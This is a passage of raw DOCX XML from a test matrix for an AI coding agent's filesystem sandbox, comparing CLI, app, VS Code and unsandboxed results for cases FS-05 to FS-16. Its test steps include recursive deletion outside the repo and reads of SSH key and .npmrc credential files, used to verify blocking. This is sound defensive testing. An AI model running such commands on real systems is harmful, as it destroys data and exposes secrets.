            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Delete outside repo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">rmdir /s /q C:\SbxTest\outside</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">rm -rf</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in WSL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Folder survives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Folder deleted</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — the core risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Read home secrets (no deniedPaths)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">type %USERPROFILE%\.ssh\id_fake</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Docs conflict: one page says home is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">read-only</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, another says home is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> granted — record actual result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Blocked — Microsoft's test plan (vscode#319218) expects a home-folder file outside the workspace to fail with "Access is denied" / "Permission denied"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Readable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">deniedPaths enforced</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (P3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Add </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.ssh</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\SbxTest\secrets</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">deniedPaths</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; read them</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ On Windows, if the build can't enforce deny → command </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">fails</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> with unsupported-policy (never runs open)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Same fail-closed behaviour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Readable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Denied child under granted parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Grant </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\SbxTest</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> R/W, deny </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\SbxTest\secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Child stays denied (more specific wins)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ (denied &gt; read-only &gt; R/W)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Read-only grant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Add </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\SbxTest\ref</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to read-only; read then write</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ read · ⛔ write</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ / ⛔ ("Additional read-only")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ / ⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ / ✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Extra read/write grant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Add </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">D:\build\out</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to R/W; write a file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ ("Additional read/write")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Denied path that doesn't exist yet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Deny </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">repo\.env</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> before creating it; run any command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ CLI </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">creates a directory</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> at </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.env</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and leaves it — create the real file first</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">No side-effect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Working directory not auto-granted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Set </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">addCurrentWorkingDirectory: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; run </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Git fails until paths granted manually</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a — VS Code always grants CWD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Package install – default dev-tool access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">npm ci</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pip install -r</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">dotnet restore</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">mvn package</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> against Artifactory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Registries/toolchains read-only, build caches R/W</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ (also reads tool dirs on PATH)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Dev-tool access OFF</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (P4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowDevToolAccess: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; repeat FS-13; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">type %USERPROFILE%\.npmrc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Restore/auth likely fails until cache </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">R/W</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and config paths granted; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.npmrc</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Managed-only for app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Preview a command's access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox policy npm install</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Shows dev-tool grants without running it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox policy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> exists; command arg not documented</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Reports sandbox off</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Built-in edit tool (not shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Ask agent to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">edit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">%USERPROFILE%\Desktop\x.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> with its file tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Blocked by </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">software</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> check only (no OS backstop)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Uses VS Code's own permission checks / approvals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Governed by approvals only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
